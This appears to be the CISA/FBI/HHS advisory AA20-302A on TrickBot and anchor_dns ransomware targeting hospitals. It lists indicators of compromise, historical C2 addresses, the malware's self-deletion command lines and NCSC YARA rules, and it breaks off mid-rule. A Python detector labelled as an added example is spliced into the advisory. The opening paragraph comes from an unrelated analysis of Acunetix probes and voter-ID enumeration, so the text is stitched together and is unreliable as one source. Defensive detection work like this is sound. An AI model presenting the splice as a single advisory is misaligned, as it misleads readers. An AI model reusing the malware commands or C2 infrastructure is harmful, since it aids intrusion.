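On the constructed sample the script reports the two Acunetix probes from one client and two scripting clients walking consecutive voterid values, while the single browser lookup and the lone cURL request are left alone. Keep in mind the advisory's own caveat: a scripting User-Agent by itself is not malicious, and the IP list it publishes overlaps with commercial VPN exit nodes, so treat hits as leads to correlate with the advisory's dates and IOCs rather than as verdicts.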

AA20-302A: Ransomware Activity Targeting the Healthcare and Public Health Sector
Original release date: October 28, 2020 | Last revised: November 2, 2020<br/><h3>Summary</h3><p><strong><em>This advisory was updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection.</em></strong></p> <p class="tip-intro" style="font-size: 15px;"><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 7 framework. See the <a href="https://attack.mitre.org/versions/v7/techniques/enterprise/">ATT&amp;CK for Enterprise version 7</a> for all referenced threat actor tactics and techniques.</em></p> <p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS). This advisory describes the tactics, techniques, and procedures (TTPs) used by cybercriminals against targets in the Healthcare and Public Health&nbsp;(HPH) Sector&nbsp;to infect systems with ransomware, notably Ryuk and Conti, for financial gain.</p> <p>CISA, FBI, and HHS have credible information of an increased and imminent cybercrime threat to U.S. hospitals and healthcare providers. 
CISA, FBI, and HHS are sharing this information to provide warning to healthcare providers to ensure that they take timely and reasonable precautions to protect their networks from these threats.</p> <p><a href="https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf">Click here</a> for a PDF version of this report.</p> <h4>Key Findings</h4> <ul> <li>CISA, FBI, and HHS assess malicious cyber actors are targeting the HPH Sector with TrickBot and BazarLoader malware, often leading to ransomware attacks, data theft, and the disruption of healthcare services.</li> <li>These issues will be particularly challenging for organizations within the COVID-19 pandemic; therefore, administrators will need to balance this risk when determining their cybersecurity investments.</li> </ul> <h3>Technical Details</h3><h3>Threat Details</h3> <p>The cybercriminal enterprise behind TrickBot, which is likely also the creator of BazarLoader malware, has continued to develop new functionality and tools, increasing the ease, speed, and profitability of victimization. These threat actors increasingly use loaders—like TrickBot and BazarLoader (or BazarBackdoor)—as part of their malicious cyber campaigns. Cybercriminals disseminate TrickBot and BazarLoader via phishing campaigns that contain either links to malicious websites that host the malware or attachments with the malware. Loaders start the infection chain by distributing the payload; they deploy and execute the backdoor from the command and control (C2) server and install it on the victim’s machine.</p> <h4>TrickBot</h4> <p>What began as a banking trojan and descendant of Dyre malware, TrickBot now provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. 
These activities include credential harvesting, mail exfiltration, cryptomining, point-of-sale data exfiltration, and the deployment of ransomware, such as Ryuk and Conti.</p> <p>In early 2019, the FBI began to observe new TrickBot modules named Anchor, which cyber actors typically used in attacks targeting high-profile victims—such as large corporations. These attacks often involved data exfiltration from networks and point-of-sale devices. As part of the new Anchor toolset, TrickBot developers created <code>anchor_dns</code>, a tool for sending data to and receiving data from victim machines using Domain Name System (DNS) tunneling.</p> <p><code>anchor_dns</code> is a backdoor that allows victim machines to communicate with C2 servers over DNS to evade typical network defense products and make their malicious communications blend in with legitimate DNS traffic. <code>anchor_dns</code> uses a single-byte <code>XOR</code> cipher to encrypt its communications, which have been observed using key <code>0xB9</code>. Once decrypted, the string <code>anchor_dns</code> can be found in the DNS request traffic.</p> <h4>TrickBot Indicators of Compromise</h4> <p>After successful execution of the malware, TrickBot copies itself as an executable file with a 12-character randomly generated file name (e.g., <code>mfjdieks.exe</code>) and places this file in one of the following directories.</p> <ul> <li><code>C:\Windows\</code></li> <li><code>C:\Windows\SysWOW64\</code></li> <li><code>C:\Users\[Username]\AppData\Roaming\</code></li> </ul> <p>Once the executable is running and has established communication with its C2s, it downloads the modules appropriate to the infected host’s processor architecture (32- or 64-bit instruction set) and places them in the host’s <code>%APPDATA%</code> or <code>%PROGRAMDATA%</code> directory, such as <code>%AppData\Roaming\winapp</code>. 
Some commonly named plugins created in a Modules subdirectory are listed below (the detected architecture is appended to the module filename, e.g., <code>importDll32</code> or <code>importDll64</code>):</p> <ul> <li><code>Systeminfo</code></li> <li><code>importDll</code></li> <li><code>outlookDll</code></li> <li><code>injectDll</code> with a directory (e.g., <code>injectDLL64_configs</code>) containing configuration files: <ul> <li><code>dinj</code></li> <li><code>sinj</code></li> <li><code>dpost</code></li> </ul> </li> <li><code>mailsearcher</code> with a directory (e.g., <code>mailsearcher64_configs</code>) containing the configuration file: <ul> <li><code>mailconf</code></li> </ul> </li> <li><code>networkDll</code> with a directory (e.g., <code>networkDll64_configs</code>) containing the configuration file: <ul> <li><code>dpost</code></li> </ul> </li> <li><code>wormDll</code></li> <li><code>tabDll</code></li> <li><code>shareDll</code></li> </ul> <p>A file named <code>client_id</code>, <code>data</code>, or <code>FAQ</code> containing the assigned bot ID of the compromised system is created in the malware directory. A file named <code>group_tag</code> or <code>Readme.md</code> containing the TrickBot campaign IDs is created in the malware directory.</p> <p>The malware may also drop a file named <code>anchorDiag.txt</code> in one of the directories listed above.</p> <p>Part of the initial network communications with the C2 server involves sending information about the victim machine, such as its computer name/hostname, operating system version, and build, via a base64-encoded <code>GUID</code>. The <code>GUID</code> is composed of <code>/GroupID/ClientID/</code> with the following naming convention:</p> <p><code>/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/</code></p> <p>The malware uses scheduled tasks that run every 15 minutes to ensure persistence on the victim machine. 
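</p>
<p>The <code>anchor_dns</code> beacon and the TrickBot host indicators described in this section, as an added example that is not code from the advisory or the NCSC: a Python checker that decodes a DNS query name with the single-byte XOR key <code>0xB9</code> and matches the <code>/anchor_dns/...</code> GUID, plus matchers for the <code>autoupdate#[5_random_numbers]</code> task name and the two self-deletion command lines. The advisory does not say how the XORed bytes are packed into DNS labels, so hex-encoded labels under the listed anchor_dns domains is an assumption, and the sample query, host name, user name and command lines are constructed, not captured.</p>

```python
"""
Added example (not code from the advisory or the NCSC): turns the anchor_dns
and TrickBot indicators from this section into checks a defender can run over
DNS and process telemetry.

DNS: anchor_dns XORs its traffic with 0xB9; decrypted requests carry
/anchor_dns/[COMPUTERNAME]_[WindowsVersionBuildNo].[32CharacterString]/ .
ASSUMPTION (the advisory does not state the packing): lowercase hex, at most
63 characters per label, under one of the listed anchor_dns domains. Change
labels_to_bytes() if captured traffic shows a different packing.
Host: the autoupdate#NNNNN task name and the two self-deletion command lines.
"""
import re

XOR_KEY = 0xB9
# Domains the advisory associates with anchor_dns (defanging brackets removed).
ANCHOR_DNS_DOMAINS = ("kostunivo.com", "chishir.com",
                      "mangoclone.com", "onixcellent.com")
GUID_RE = re.compile(
    r"/anchor_dns/(?P<host>[^_/]+)_(?P<build>\d+)\.(?P<rand>[A-Za-z0-9]{32})/")
TASK_RE = re.compile(r"^autoupdate#\d{5}$")
SELF_DELETE_RE = re.compile(
    r"cmd\.exe\s+/c\s+("
    r"timeout\s+\d+\s*&&\s*del\s"                             # timeout 3 && del ...
    r"|powershell\s+.*start-sleep\s+\d+\s*;\s*remove-item\s"  # Start-Sleep 3; Remove-Item ...
    r")",
    re.IGNORECASE)


def xor_bytes(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def split_query(qname):
    """Return (data labels, matched anchor_dns domain), or (None, None)."""
    qname = qname.rstrip(".").lower()
    for dom in ANCHOR_DNS_DOMAINS:
        if qname == dom or qname.endswith("." + dom):
            sub = qname[:-len(dom) - 1] if qname != dom else ""
            return [lab for lab in sub.split(".") if lab], dom
    return None, None


def labels_to_bytes(labels):
    """Assumed packing: concatenated hex labels. None if not valid hex."""
    blob = "".join(labels)
    if not blob or len(blob) % 2:
        return None
    try:
        return bytes.fromhex(blob)
    except ValueError:
        return None


def parse_beacon(qname):
    """Decode one query name into the GUID fields, or None if not a beacon."""
    labels, dom = split_query(qname)
    if labels is None:
        return None
    raw = labels_to_bytes(labels)
    if raw is None:
        return None
    text = xor_bytes(raw).decode("ascii", errors="replace")
    m = GUID_RE.search(text)
    if not m:
        return None
    return {"domain": dom, "host": m["host"], "build": m["build"],
            "rand": m["rand"]}


def encode_beacon(guid, domain):
    """Constructed-sample helper: pack a GUID the way parse_beacon() expects."""
    hx = xor_bytes(guid.encode("ascii")).hex()
    return ".".join(hx[i:i + 63] for i in range(0, len(hx), 63)) + "." + domain


def is_trickbot_task_name(name):
    """True for the autoupdate#[5_random_numbers] task naming convention."""
    return bool(TASK_RE.match(name.strip()))


def is_self_delete_cmdline(cmdline):
    """True for the two self-deletion command lines quoted in the advisory."""
    return bool(SELF_DELETE_RE.search(cmdline))


# Constructed samples, not real captures: host name, build number, 32-char
# string, user name and paths below are invented for the demonstration.
SAMPLE_GUID = "/anchor_dns/WS-LAB-01_17763.0123456789abcdef0123456789ABCDEF/"
SAMPLE_QUERY = encode_beacon(SAMPLE_GUID, "kostunivo.com")
SAMPLE_CMDLINES = [
    r"cmd.exe /c timeout 3 && del C:\Users\alice\mfjdieks.exe",
    r'cmd.exe /C PowerShell "Start-Sleep 3; Remove-Item '
    r'C:\Users\alice\AppData\Roaming\winapp\mfjdieks.exe"',
    r"cmd.exe /c ping 127.0.0.1",
]

if __name__ == "__main__":
    print(SAMPLE_QUERY, parse_beacon(SAMPLE_QUERY))
    for line in SAMPLE_CMDLINES:
        print(is_self_delete_cmdline(line), line)
```
<p>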
The scheduled task typically uses the following naming convention.</p> <p><code>[random_folder_name_in_%APPDATA%_excluding_Microsoft]</code></p> <p><code>autoupdate#[5_random_numbers]</code> (e.g., Task <code>autoupdate#16876</code>).</p> <p>After successful execution, <code>anchor_dns</code> further deploys malicious batch scripts (<code>.bat</code>) using PowerShell commands.</p> <p>The malware deploys self-deletion techniques by executing the following commands.</p> <ul> <li><code>cmd.exe /c timeout 3 &amp;&amp; del C:\Users\[username]\[malware_sample]</code></li> <li><code>cmd.exe /C PowerShell \"Start-Sleep 3; Remove-Item C:\Users\[username]\[malware_sample_location]\"</code></li> </ul> <p>The following domains found in outbound DNS records are associated with <code>anchor_dns</code>.</p> <ul> <li><code>kostunivo[.]com</code></li> <li><code>chishir[.]com</code></li> <li><code>mangoclone[.]com</code></li> <li><code>onixcellent[.]com</code></li> </ul> <p>The malware uses the following legitimate domains to test internet connectivity.</p> <ul> <li><code>ipecho[.]net</code></li> <li><code>api[.]ipify[.]org</code></li> <li><code>checkip[.]amazonaws[.]com</code></li> <li><code>ip[.]anysrc[.]net</code></li> <li><code>wtfismyip[.]com</code></li> <li><code>ipinfo[.]io</code></li> <li><code>icanhazip[.]com</code></li> <li><code>myexternalip[.]com</code></li> <li><code>ident[.]me</code></li> </ul> <p>Currently, there is an open-source tracker for TrickBot C2 servers located at <a href="https://feodotracker.abuse.ch/browse/trickbot/">https://feodotracker.abuse.ch/browse/trickbot/</a>.</p> <p>The <code>anchor_dns</code> malware historically used the following C2 servers.</p> <ul> <li><code>23[.]95[.]97[.]59</code></li> <li><code>51[.]254[.]25[.]115</code></li> <li><code>193[.]183[.]98[.]66</code></li> <li><code>91[.]217[.]137[.]37</code></li> <li><code>87[.]98[.]175[.]85</code></li> </ul> <h4>TrickBot YARA Rules</h4> <div class="special_container">rule anchor_dns_strings_filenames 
{<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off strings or filenames used in malware"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fc0efd612ad528795472e99cae5944b68b8e26dc"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "794eb3a9ce8b7e5092bb1b93341a54097f5b78a9"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash3 = "9dfce70fded4f3bc2aa50ca772b0f9094b7b1fb2"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash4 = "24d4bbc982a6a561f0426a683b9617de1a96a74a"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ",Control_RunDLL \x00"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$GUID" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = ":$DATA" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "/1001/"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)qwertyuiopasdfghjklzxcvbnm(\x00|\xCC)/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = /(\x00|\xCC)QWERTYUIOPASDFGHJKLZXCVBNM(\x00|\xCC)/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "start program with cmdline \"%s\""<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Global\\fde345tyhoVGYHUJKIOuy"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "ChardWorker::thExecute: error registry me"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "get command: incode %s, cmdid \"%s\", cmd \"%s\""<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "anchorDNS"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x86"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Anchor_x64"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br /> }</div> <div class="special_container">rule anchor_dns_icmp_transport {<br /> &nbsp;&nbsp;&nbsp; 
meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off ICMP transport strings"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "reset_connection &lt;- %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "server_ok &lt;- %s (packets on server %s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "erase successfully transmitted packet (count: %d)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Packet sended with crc %s -&gt; %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send data confimation to server(%s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "data recived from &lt;- %s"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "Rearmost packed recived (id: %s)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ = "send poll to server -&gt; : %s"<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and 3 of them<br /> }</div> <div class="special_container">rule anchor_dns_config_dexor {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off configuration deobfuscation (XOR 0x23 countup)"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "d0278ec015e10ada000915a1943ddbb3a0b6b3db"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {75 1F 56 6A 40 B2 23 33 C9 5E 8A 81 ?? ?? ?? ?? 32 C2 FE C2 88 81 ?? ?? ?? ?? 41 83 EE 01 75 EA 5E B8 ?? ?? ?? ?? 
C3}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {41 B0 23 41 B9 80 00 00 00 8A 84 3A ?? ?? ?? 00 41 32 C0 41 FE C0 88 04 32 48 FF C2 49 83 E9 01 75 E7}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_installer {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS installer samples based off MZ magic under one-time pad or deobfuscation loop code"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "fa98074dc18ad7e2d357b5d168c00a91256d87d1"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "78f0737d2b1e605aad62af252b246ef390521f02"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pre = {43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00} //CONOUT$<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $pst = {6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00} //kernel32.dll<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 = {8B C8 89 4D F8 83 F9 FF 74 52 46 89 5D F4 88 5D FF 85 F6 74 34 8A 83 ?? ?? ?? ?? 32 83 ?? ?? ?? ?? 6A 00 88 45 FF 8D 45 F4 50 6A 01 8D 45 FF 50 51 FF 15 34 80 41 00 8B 4D F8 43 8B F0 81 FB 00 ?? ?? ?? 72 CC 85 F6 75 08}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x64 = {42 0F B6 84 3F ?? ?? ?? ?? 4C 8D 8C 24 80 00 00 00 42 32 84 3F ?? ?? ?? ?? 48 8D 54 24 78 41 B8 01 00 00 00 88 44 24 78 48 8B CE 48 89 6C 24 20 FF 15 ?? ?? ?? ?? 48 FF C7 8B D8 48 81 FF ?? ?? ?? ?? 
72 B8}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (&nbsp;&nbsp; uint16(@pre+16) ^ uint16(@pre+16+((@pst-(@pre+16))\2)) == 0x5A4D<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $deob_x86 or $deob_x64<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> }</div> <div class="special_container">import "pe"<br /> rule anchor_dns_string_1001_with_pe_section_dll_export_resolve_ip_domains {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off /1001/ string in combination with DLL export name string, PE section .addr or IP resolution domains"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "ff8237252d53200c132dd742edc77a6c67565eee"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "c8299aadf886da55cb47e5cbafe8c5a482b47fc8"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $str1001 = {2F 31 30 30 31 2F 00} // /1001/<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl = {2C 43 6F 6E 74 72 6F 6C 5F 52 75 6E 44 4C 4C 20 00} // ,Control_RunDLL<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip1 = "checkip.amazonaws.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip2 = "ipecho.net" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip3 = "ipinfo.io" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip4 = "api.ipify.org" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip5 = "icanhazip.com" ascii wide<br /> 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip6 = "myexternalip.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip7 = "wtfismyip.com" ascii wide<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $ip8 = "ip.anysrc.net" ascii wide<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and $str1001<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and (<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for any i in (0..pe.number_of_sections): (<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pe.sections[i].name == ".addr"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $strCtrl<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6 of ($ip*)<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )<br /> }</div> <div class="special_container">rule anchor_dns_check_random_string_in_dns_response {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off checking random string in DNS response"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {8A D8 83 C4 10 84 DB 75 08 8B 7D 
BC E9 84 00 00 00 8B 7D BC 32 DB 8B C7 33 F6 0F 1F 00 85 C0 74 71 40 6A 2F 50 E8 ?? ?? ?? ?? 46 83 C4 08 83 FE 03 72 EA 85 C0 74 5B 83 7D D4 10 8D 4D C0 8B 75 D0 8D 50 01 0F 43 4D C0 83 EE 04 72 11 8B 02 3B 01 75 10 83 C2 04 83 C1 04 83 EE 04 73 EF 83 FE FC 74 2D 8A 02 3A 01 75 29 83 FE FD 74 22 8A 42 01 3A 41 01 75 1C 83 FE FE 74 15 8A 42 02 3A 41 02 75 0F 83 FE FF 74 08 8A 42 03 3A 41 03 75 02 B3 01 8B 75 B8}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {4C 39 75 EF 74 56 48 8D 45 DF 48 83 7D F7 10 48 0F 43 45 DF 49 8B FE 48 85 C0 74 40 48 8D 48 01 BA 2F 00 00 00 E8 ?? ?? ?? ?? 49 03 FF 48 83 FF 03 72 E4 48 85 C0 74 24 48 8D 55 1F 48 83 7D 37 10 48 0F 43 55 1F 48 8D 48 01 4C 8B 45 2F E8 ?? ?? ?? ?? 0F B6 DB 85 C0 41 0F 44 DF 49 03 F7 48 8B 55 F7 48 83 FE 05 0F 82 6A FF FF FF}<br /> &nbsp;&nbsp;&nbsp; condition:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and any of them<br /> }</div> <div class="special_container">rule anchor_dns_default_result_execute_command {<br /> &nbsp;&nbsp;&nbsp; meta:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; description = "Rule to detect AnchorDNS samples based off default result value and executing command"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; author = "NCSC"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash1 = "056f326d9ab960ed02356b34a6dcd72d7180fc83"<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; hash2 = "14e9d68bba7a184863667c680a8d5a757149aa36"<br /> &nbsp;&nbsp;&nbsp; strings:<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x86 = {83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}<br /> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $x64 = {48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 
